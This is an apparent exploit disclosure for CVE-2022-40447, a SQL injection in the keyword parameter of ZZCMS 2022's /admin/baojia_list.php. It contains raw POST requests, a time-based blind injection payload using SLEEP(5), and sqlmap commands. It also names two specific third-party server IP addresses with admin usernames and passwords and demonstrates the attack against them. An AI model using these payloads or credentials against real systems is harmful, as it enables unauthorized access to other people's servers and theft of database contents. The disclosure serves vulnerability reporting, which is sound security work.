Headline

CVE-2022-40447: ZZCMS2022 is vulnerable to SQL injection in "baojia_list.php" · Issue #5 · liong007/ZZCMS

ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the keyword parameter at /admin/baojia_list.php.

2 years ago

#sql #vulnerability #windows #google #ubuntu #git #php #auth

**Exploit Title：**ZZCMS2022 is vulnerable to SQL injection
Google Dork: ZZCMS
**Date：**9/11/2022
**Exploit Author：**Yuan Lirong
Vendor Homepage: http://www.zzcms.net/about/6.html
Software Link:
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip
http://www.zzcms.net/download/zzcms2022.zip
Version: ZZCMS 2022
Tested on:Windows Server 2008,Ubuntu
Attack vector(s):
zzcms is a set of content management system (CMS) of China’s zzcms team.
ZZCMS2022 is vulnerable to SQL injection via baojia_list.php.
After the administrator logged in,than to SQL injection via the parameter “keyword” of "/admin/baojia_list.php ".

POC：
You need to use an IP address in China to access.
Case 1:
Login http://119.28.176.129/admin
User: admin Password: 123456

Click “报价","查找” input 1’，Return error “Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in /www/wwwroot/zzcms2022/inc/conn.php on line 54”

Check the source code of "/admin/baojia_list.php". The condition variables in the SQL statement select are not protected by single quotation marks, which may lead to SQL injection vulnerabilities.

2）SQL injection on parameter “keyword” of “baojia_list. PHP”
POST /admin/baojia_list.php? HTTP/1.1
Host: 119.28.176.129
keyword=1’&Submit=%E6%9F%A5%E6%89%BE

EXP:
keyword=1’ AND (SELECT 3526 FROM (SELECT(SLEEP(5)))qvLz)-- Iojq&Submit=%E6%9F%A5%E6%89%BE

3）Scanning request packages with sqlmap
sqlmap.py -r sql.txt --level 3 risk 3 --current-db
The contents of sql.txt are as follows:

The sqlmap scan results are as follows:

Case 2:
Login http://175.6.210.20:81/admin
User: admin Password: 123456789qwe

Click “报价","查找” input 1’，Return error “Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in C:\wwwroot\zzcms2022\inc\conn.php on line 54”

2）SQL injection on parameter “keyword” of “baojia_list. PHP”
POST /admin/baojia_list.php? HTTP/1.1
Host: 175.6.210.20:81
keyword=1’&Submit=%E6%9F%A5%E6%89%BE

EXP:
keyword=1’ AND (SELECT 3526 FROM (SELECT(SLEEP(5)))qvLz)-- Iojq&Submit=%E6%9F%A5%E6%89%BE

3）Scanning request packages with sqlmap
sqlmap.py -r sql2021.txt --level 3 risk 3 --current-db
The contents of sql2021.txt are as follows:

The sqlmap scan results are as follows: